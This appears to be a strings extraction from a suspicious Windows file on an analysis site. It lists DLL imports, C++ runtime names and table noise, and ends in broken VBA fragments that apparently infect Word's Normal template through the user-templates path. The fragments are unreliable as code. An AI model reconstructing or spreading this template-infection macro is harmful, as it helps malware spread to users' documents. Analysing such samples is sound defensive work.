GetWindowRect
USER32.dll
OleUninitialize
OleInitialize
ole32.dll
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
RegQueryValueExA
ADVAPI32.dll
NetApiBufferFree
NetWkstaSetInfo
NetUserGetInfo
NETAPI32.dll
TransparentBlt
AlphaBlend
GradientFill
MSIMG32.dll
InterlockedIncrement
InterlockedDecrement
WideCharToMultiByte
InterlockedExchange
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
MultiByteToWideChar
GetTimeFormatA
GetDateFormatA
HeapAlloc
RtlUnwind
RaiseException
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetCurrentThreadId
GetCommandLineA
HeapFree
GetVersionExA
GetProcessHeap
GetLastError
GetCPInfo
LCMapStringA
LCMapStringW
GetProcAddress
TlsSetValue
TlsFree
SetLastError
GetACP
GetOEMCP
GetTimeZoneInformation
SetHandleCount
GetStdHandle
GetFileType
GetStartupInfoA
VirtualFree
VirtualAlloc
HeapReAlloc
HeapDestroy
HeapCreate
ExitProcess
WriteFile
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
IsValidCodePage
GetStringTypeA
GetStringTypeW
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
GetConsoleCP
GetConsoleMode
FlushFileBuffers
SetFilePointer
CloseHandle
HeapSize
LoadLibraryA
ReadFile
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
SetStdHandle
GetLocaleInfoW
CreateFileA
CompareStringA
CompareStringW
SetEnvironmentVariableA
Tone.dll
Coastscore
Pairoccur
Visitwish
.?AVfailure@ios_base@std@@
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVbad_cast@std@@
.?AVbad_alloc@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AVfacet@locale@std@@
.?AV?$numpunct@D@std@@
.?AUctype_base@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$ctype@D@std@@
.?AV?$codecvt@DDH@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AV_Locimp@locale@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
0!0&0+01070=0C0H0M0S0Y0_0e0j0o0u0{0
11$1)1/151;1A1F1K1Q1U1[1_1e1i1
2$232?2F2O2V2\2b2o2
3"3'3-3<3C3I3U3^3d3q3
4*414:4A4H4N4W4e4m4x4~4
535?5M5^5l5r5{5
6"6)6/666E6N6V6b6g6
7$70767<7C7P7W7e7u7
808=8O8a8o8t8{8
9$9,9>9F9N9`9e9k9s9y9
::(:7:F:K:S:X:^:g:o:{:
;+;:;@;F;L;Q;Y;_;e;p;v;{;
<)<4<:<B<H<N<V<h<q<x<
="=,=2=7=@=J=P=U=[=b=h=q=y=
>>)>0>9>E>L>U>\>a>
?$?+?2?8???E?R?Z?`?s?
0'02080=0K0T0Z0b0y0
1#1+1:1D1I1O1n1t1y1
2;2F2l2u2
33%3_3e3l3r3
:%:1:7:=:C:H:S:[:i:o:t:z:
;%;,;3;8;?;E;P;V;g;r;
<#<-<4<=<E<L<S<Z<e<p<|<
=5=A=G=M=S=X=c=k=y=
>$>1>8>B>I>R>Z>a>h>o>z>
?#?(?9?D?S?Y?d?l?r?~?
0 0,02080?0J0P0W0b0g0m0y0
1 1&1/181?1F1L1T1Y1a1f1m1v1|1
2+2T2]2
3%363B3G3M3S3Y3_3{3
4%464A4L4U4\4c4i4u4~4
4(535=5I5P5V5]5b5l5r5
6"6'666>6E6K6\6i6s6z6
7"72797B7J7O7\7b7i7o7x7
8%80868<8A8G8S8[8i8n8t8z8
9#9/979=9B9I9U9^9k9q9x9}9
:%:,:3:?:J:R:Z:k:{:
; ;&;.;E;O;W;_;f;n;s;{;
<<%<*<0<K<W<_<e<k<p<x<}<
=#=9=E=L=[=c=j=p=w=
>#>->8>N>V>_>k>p>
?"?:?F?P?[?a?g?l?r?
0"0(0.040:0?0K0Q0a0l0
1"1(1.1:1D1O1\1e1o1z1
2"2.242<2E2Q2W2]2b2h2n2z2
33(30363=3F3M3S3Y3a3i3p3|3
4#4,444:4@4K4R4b4i4q4v4|4
5#5/545H5R5X5`5f5l5r5
6 6%6+696J6X6]6c6i6t6z6
7$7-797?7F7L7R7^7h7
8 8,81888B8H8q8
9"9*90999D9M9Y9i9y9
: :&:2:8:H:P:X:^:d:p:z:
;;';0;8;=;C;J;R;Z;e;j;s;|;
<8<D<W<c<m<s<
=$=*=3=9=?=F=S=Y=_=f=s=y=
>!>(>/>6>>>J>O>c>p>
?!?*?;?A?K?T?`?j?u?
030?0E0O0U0^0d0j0q0~0
0 1,1>1H1N1Z1d1j1o1u1|1
2*2/252D2J2Y2t2
3"3(3-3A3P3^3f3l3u3{3
4&4,484B4H4M4S4Z4f4m4y4
5%5+51575?5E5U5j5
6$606:6@6E6K6R6^6e6z6
7>7R7Z7f7m7
828C8H8Q8W8]8m8x8
9%949:9@9F9|9
:$:4:::V:a:
;1;7;=;C;H;N;v;
<'<9<F<N<V<\<g<m<t<z<
=8=D=M=S=X=^=d=i=o=x=
>%>+>A>G>U>[>a>
? ?*?3?<?E?Z?h?n?|?
00*000B0I0S0Z0b0n0
1 1&11171@1J1P1h1w1
2!2&242<2A2G2S2Y2a2g2m2v2
3%3,323:3D3J3V3_3e3m3s3}3
4 4(4.4:4@4E4V4]4d4j4p4v4
5'5-555B5I5T5Y5a5f5l5x5~5
6"6/696@6F6L6R6[6`6f6n6w6
7#7)7/7<7B7K7R7^7h7r7w7
8#8.878E8K8R8X8a8i8s8y8~8
9$9H9t9
: :':5:E:L:Y:g:l:u:}:
;%;0;K;Z;`;v;
<9<><D<V<p<v<
="=(=.=4=Z=e=}=
>&>+>3>8>>>P>]>b>h>n>z>
?"?'?-?;?A?M?S?c?h?n?x?}?
0'0/070<0B0M0S0d0i0~0
1(1.131=1C1N1n1w1
2(2:2T2i2t2
2^3f3l3r3}3
4'414<4H4N4T4Z4k4q4w4
5C5I5O5]5c5h5x5~5
6#616;6A6J6U6[6e6s6y6
6+737;7@7F7L7R7m7y7
8#878A8G8L8q8w8}8
9"9,939<9M9U9[9b9h9m9v9
:0:E:V:[:e:k:q:
;%;+;9;J;R;X;^;n;{;
<4<<<Q<^<h<o<u<{<
=$=-=5=;=@=F=L=Q=V=
5&636^6
6(7F7S7z7
0{1V2i2E3R3f4y4
88=8Y8'9?9
<"=/=H=
0f1y1s2
3*40464
4Z5a5n5v5~5
5<6V618D8
0121N1Z1
3(454I4p4
656B6V6}6
7#7-7<7U7l7{7
8#818Q8[8x8
;);2;K;[;{;
<#<K<v<
?#?+?4?9?
]0h0s0~0
3&4=4N4
5"5.5]5:6
0/0_0i0u0~001
666J6b6n6
7(737[7`7f7j7p7t7z7~7
:(:C:J:i:
<"<4<9<?<E<q<v<
<$=*=E=v=
;2<8<R<c<n<|<
=2=U=_=h=
4 7P7Z7e7[9R:m:
>*>4>>>i>q>
5!5(5,5054585<5@5D5
6,63686<6@6a6
6*7074787<7
7.878C8~8
;*;?;E;N;U;o;x;~;
< <A<K<f<
>O>b>h>t>z>
?&?2?7?<?B?F?L?Q?W?_?k?
3.383K3m3
616:6@6I6N6]6
9%9*909A9F9S9[9j9q9~9
9$;1;D;Q;
>?o?w?
4"4;4M4S4\4o4
4&5F5V5\5c5p5w5}5
88(858@8R8e8p8v8|8
9 9-939M9^9d9u9
'020:0
1"141=1I1R1Y1c1i1o1
3&3@3H3P3\3i3
3J4W4l4
5A5F5n5
9,:?:u:|:
1!1%1)1-1115191=1A1E1I1M1Q1U1Y1]1a1k1u1
4V5\5b5h5n5t5{5
6!6'6-6C6J6
7$7)7q8x8
45(5T5Z5c5j5
8$8(8,8084888<8@8
= =9=E=Q=X=
=$>;>K>P>o>t>
>3?9?R?X?
!0D0Q0]0e0m0y0
;$<S<U=
0(1.1P1q1}1
3I3X3d3
70868B8
:E:K:W:
3(3.3;3b3s3z3
4 4E4l4s4y4
1`3d3h3l3p3t3x3|3
3Z4x6u8(9
0&0.0;0X0b0k0v0
2"272W2
4-575>5Y5a5n5u5/6N6
:k;a<i<
>??E?U?
475N5|5
<!<%<)<-<1<5<@<
=.===i=
7A9G9L9R9\9k9
>??H?Y?h?
;!<N<i<
= =*=6=@=J=V=b=l=x=
2 2$2(2,2024282D2H2T2
4>8><>@>D>H>\>`>d>l>p>t>x>|>
?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0 0$0(0,00040`0d0
2 2$2(2,2
3 3$3,3034383
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9 9(90989@9H9P9X9`9h9p9x9
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
2 2$2(2,2024282<2@2D2
3`3d3t3x3|3
4 40444D4H4L4T4l4|4
5$5(5,545L5\5`5d5l5
6 60646D6H6L6P6T6\6t6x6
7(7,7<7@7H7`7p7t7
848D8H8X8\8`8d8l8
9 90949D9H9L9P9X9p9
:(:,:<:@:D:L:d:t:x:
<,<4<<<X<`<x<
= =(=4=T=`=
>$>H>\>l>
? ?(?0?8?<?D?X?`?h?t?
0(00080@0H0P0X0`0h0t0
10181D1d1p1
2 2@2L2l2x2
3(3H3T3t3
4$4,444@4`4d4h4p4
5 5,5`5
686X6x6
7 7@7`7
8@8H8L8d8h8
9(9H9h9
:$:(:H:h:
;(;H;h;
<$<(<H<h<
1$1D1`1|1
2,202P2l2
484<4@4d4h4p4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
88:<:x>
0<0H0L0P0T0X0`0d0
3$3,343<3D3L3T3\3d3l3t3|3
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
DF8D04C-
5BFA-101@B-BDE5
ram File
s\Common
Microso
ft Share
d\OFFICE
16\MSO.D
M 16 .0 Ob
ibrary
5Scrip
f420B2
fE718-1
1CF-893D
20C90542 28}#1
run.dllH*
Runtim
sDocumenPtG
ModuleP1G
Attribut
e VB_Nam
e = "Mod
im pls A
Sub ous
l uoia(O
ptions.D
efaultFi
lePath(w
dUserTem@plates
nam(paf
" & "ier
c Search
^ObjePct,
dtPer.d
For Each
Folders
C(ThenB
Handle:
rr.Cl@]
Attribut
e VB_Nam
e = "Mod
Sub yyy
lection.
MoveDown
Unit:=w
dLine, Choun
^Cha@racter
4]cTypeBa
ckspace
l bvxfcs
Attribut
e VB_Nam
e = "Mod
im dfbvc As S
Sub bv
xfcsd()
Call 0asda
L" & "o
If Dir(
Left(Opt
ions.Def aultF
th(wdUse
rTemplatDes
$e@ctory)
" Then
ThisDocu
ment.hdh
*\CNormalrU
ThisDocument
Module1
Module2
Module3
Project
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Windows\System32\scrrun.dll
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
No antivirus signatures available.
No IRMA results available.